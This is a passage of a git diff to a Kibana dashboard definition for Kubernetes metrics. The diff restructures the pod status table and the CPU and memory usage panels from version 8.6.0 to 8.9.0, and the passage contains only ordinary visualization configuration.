Overview](#/view/kubernetes-f4dc26db-1b53-4ea2-a78b-1bfab8ea267c),\n[Kubernetes Nodes](#/view/kubernetes-b945b7b0-bcb1-11ec-b64f-7dd6e8e82013), \n[Kubernetes Pods](#/view/kubernetes-3d4d9290-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Deployments](#/view/kubernetes-5be46210-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes StatefulSets](#/view/kubernetes-21694370-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes DaemonSets](#/view/kubernetes-85879010-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes CronJobs](#/view/kubernetes-0a672d50-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Jobs](#/view/kubernetes-9bf990a0-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Volumes](#/view/kubernetes-3912d9a0-bcb2-11ec-b64f-7dd6e8e82013), [Kubernetes PV/PVC](#/view/kubernetes-dd081350-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes Services](#/view/kubernetes-ff1b3850-bcb1-11ec-b64f-7dd6e8e82013), [Kubernetes API Server](#/view/kubernetes-d3bd9650-0c14-11ed-b760-5d1bccb47f56)", - "openLinksInNewTab": false + "panelIndex": "0a10c73f-959b-40e1-b1a2-609c3fd59914", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-307ec163-d913-4ce0-8e9b-6dfc777def59", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f30047fb-d7fd-4873-9150-6e16c369fcc8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "307ec163-d913-4ce0-8e9b-6dfc777def59": { + "columnOrder": [ + "8c03fc54-6e2d-49ff-b294-bb80ae6a1a8e", + "7b682fd2-3fd6-4834-8067-a546ab543764", + "e9919412-9d5f-4db8-96bf-ab35a7b11c87", + "b1ecf062-bf74-4458-9598-2c7018cdae3d" + ], + "columns": { + "7b682fd2-3fd6-4834-8067-a546ab543764": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.status.phase: *" + }, + "isBucketed": false, + "label": "Phase", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.status.phase" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "72efb777-3b17-42a9-91c5-b17ee964ce28", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "72efb777-3b17-42a9-91c5-b17ee964ce28", - "title": "Kubernetes Dashboards [Metrics Kubernetes]", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-307ec163-d913-4ce0-8e9b-6dfc777def59", - "type": "index-pattern" + "8c03fc54-6e2d-49ff-b294-bb80ae6a1a8e": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Pod", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": false, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "f30047fb-d7fd-4873-9150-6e16c369fcc8", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "307ec163-d913-4ce0-8e9b-6dfc777def59": { - "columnOrder": [ - "8c03fc54-6e2d-49ff-b294-bb80ae6a1a8e", - "7b682fd2-3fd6-4834-8067-a546ab543764", - "e9919412-9d5f-4db8-96bf-ab35a7b11c87", - "b1ecf062-bf74-4458-9598-2c7018cdae3d" - ], - "columns": { - "7b682fd2-3fd6-4834-8067-a546ab543764": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.status.phase: *" - }, - "isBucketed": false, - "label": "Phase", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.status.phase" - }, - "8c03fc54-6e2d-49ff-b294-bb80ae6a1a8e": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Pod", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": false, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 1000 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - }, - "b1ecf062-bf74-4458-9598-2c7018cdae3d": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.status.scheduled: *" - }, - "isBucketed": false, - "label": "Scheduled", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.status.scheduled" - }, - "e9919412-9d5f-4db8-96bf-ab35a7b11c87": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.status.ready: *" - }, - "isBucketed": false, - "label": "Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.status.ready" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "f30047fb-d7fd-4873-9150-6e16c369fcc8", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.state_pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "columns": [ - { - "collapseFn": "", - "columnId": "8c03fc54-6e2d-49ff-b294-bb80ae6a1a8e", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "7b682fd2-3fd6-4834-8067-a546ab543764", - "hidden": false, - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "e9919412-9d5f-4db8-96bf-ab35a7b11c87", - "isTransposed": false - }, - { - "alignment": "right", - "columnId": "b1ecf062-bf74-4458-9598-2c7018cdae3d", - "isTransposed": false - } - ], - "headerRowHeight": "single", - "headerRowHeightLines": 1, - "layerId": "307ec163-d913-4ce0-8e9b-6dfc777def59", - "layerType": "data", - "paging": { - "enabled": true, - "size": 10 - }, - "sorting": { - "direction": "none" - } - } + "size": 1000 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" }, - "title": "Status per Pod [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" + "b1ecf062-bf74-4458-9598-2c7018cdae3d": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.status.scheduled: *" + }, + "isBucketed": false, + "label": "Scheduled", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.status.scheduled" + }, + "e9919412-9d5f-4db8-96bf-ab35a7b11c87": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.status.ready: *" + }, + "isBucketed": false, + "label": "Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.status.ready" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "f30047fb-d7fd-4873-9150-6e16c369fcc8", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.state_pod" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 15, - "i": "0a10c73f-959b-40e1-b1a2-609c3fd59914", - "w": 48, - "x": 0, - "y": 4 + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "collapseFn": "", + "columnId": "8c03fc54-6e2d-49ff-b294-bb80ae6a1a8e", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "7b682fd2-3fd6-4834-8067-a546ab543764", + "hidden": false, + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "e9919412-9d5f-4db8-96bf-ab35a7b11c87", + "isTransposed": false + }, + { + "alignment": "right", + "columnId": "b1ecf062-bf74-4458-9598-2c7018cdae3d", + "isTransposed": false + } + ], + "headerRowHeight": "single", + "headerRowHeightLines": 1, + "layerId": "307ec163-d913-4ce0-8e9b-6dfc777def59", + "layerType": "data", + "paging": { + "enabled": true, + "size": 10 }, - "panelIndex": "0a10c73f-959b-40e1-b1a2-609c3fd59914", - "title": "Status per Pod [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "sorting": { + "direction": "none" + } + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9486d409-e044-43b7-a175-e25695e38cc4", - "type": "index-pattern" + "title": "Status per Pod [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Status per Pod [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "8775bc75-d36c-4e37-94e4-ca63300d9dd3", + "w": 24, + "x": 0, + "y": 19 + }, + "panelIndex": "8775bc75-d36c-4e37-94e4-ca63300d9dd3", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9486d409-e044-43b7-a175-e25695e38cc4", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "CPU Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 2 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - "isBucketed": false, - "label": "CPU Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.cpu.usage.node.pct" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.cpu.usage.node.pct" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "9486d409-e044-43b7-a175-e25695e38cc4", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "9486d409-e044-43b7-a175-e25695e38cc4", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 15, - "i": "8775bc75-d36c-4e37-94e4-ca63300d9dd3", - "w": 24, - "x": 0, - "y": 19 + "layers": [ + { + "accessors": [ + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "panelIndex": "8775bc75-d36c-4e37-94e4-ca63300d9dd3", - "title": "CPU Usage as Pct of the Total Node CPU [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "61027d7f-6398-4aec-b154-897b913481e4", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU Usage as Pct of the Total Node CPU [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "8e7901b2-cfc3-433d-9dcb-4af30c649efb", + "w": 24, + "x": 24, + "y": 19 + }, + "panelIndex": "8e7901b2-cfc3-433d-9dcb-4af30c649efb", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "61027d7f-6398-4aec-b154-897b913481e4", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "CPU Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 2 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - "isBucketed": false, - "label": "CPU Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.cpu.usage.limit.pct" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.cpu.usage.limit.pct" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "61027d7f-6398-4aec-b154-897b913481e4", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "61027d7f-6398-4aec-b154-897b913481e4", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "kubernetes.pod" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "kubernetes.pod" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right" }, - "gridData": { - "h": 15, - "i": "8e7901b2-cfc3-433d-9dcb-4af30c649efb", - "w": 24, - "x": 24, - "y": 19 + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "8e7901b2-cfc3-433d-9dcb-4af30c649efb", - "title": "CPU Usage as Pct of the Defined Pod Limit [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0" + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ace482cc-b33b-47c1-89b1-a710fe45195e", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU Usage as Pct of the Defined Pod Limit [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 15, + "i": "98677dcb-ab94-47e8-94ca-326470ee2380", + "w": 24, + "x": 0, + "y": 34 + }, + "panelIndex": "98677dcb-ab94-47e8-94ca-326470ee2380", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "ace482cc-b33b-47c1-89b1-a710fe45195e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { + "columnOrder": [ + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" + ], + "columns": { + "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.pod.cpu.usage.node.pct: *" + }, + "isBucketed": false, + "label": "Memory Usage", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "percent", + "params": { + "decimals": 2 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a": { - "columnOrder": [ - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0", - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "columns": { - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.pod.cpu.usage.node.pct: *" - }, - "isBucketed": false, - "label": "Memory Usage", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - } - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.memory.usage.node.pct" - }, - "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.pod.name", - "operationType": "terms", - "params": { - "accuracyMode": false, - "missingBucket": false, - "orderBy": { - "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "kubernetes.pod.memory.usage.node.pct" + }, + "a83bd360-6bed-4bab-ac6c-82b8e473c2b0": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.pod.name", + "operationType": "terms", + "params": { + "accuracyMode": false, + "missingBucket": false, + "orderBy": { + "columnId": "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "ace482cc-b33b-47c1-89b1-a710fe45195e", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.pod" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "86e6d540-5fd3-483e-b1a1-b575a0a5ca9c" - ], - "layerId": "921ae90c-bc32-4ce1-b4d0-bcaec7eb339a", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "ce13a463-7e39-46f6-8d0f-14c1f9e9a0d9", - "xAccessor": "a83bd360-6bed-4bab-ac6c-82b8e473c2b0" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right" - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.pod.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + 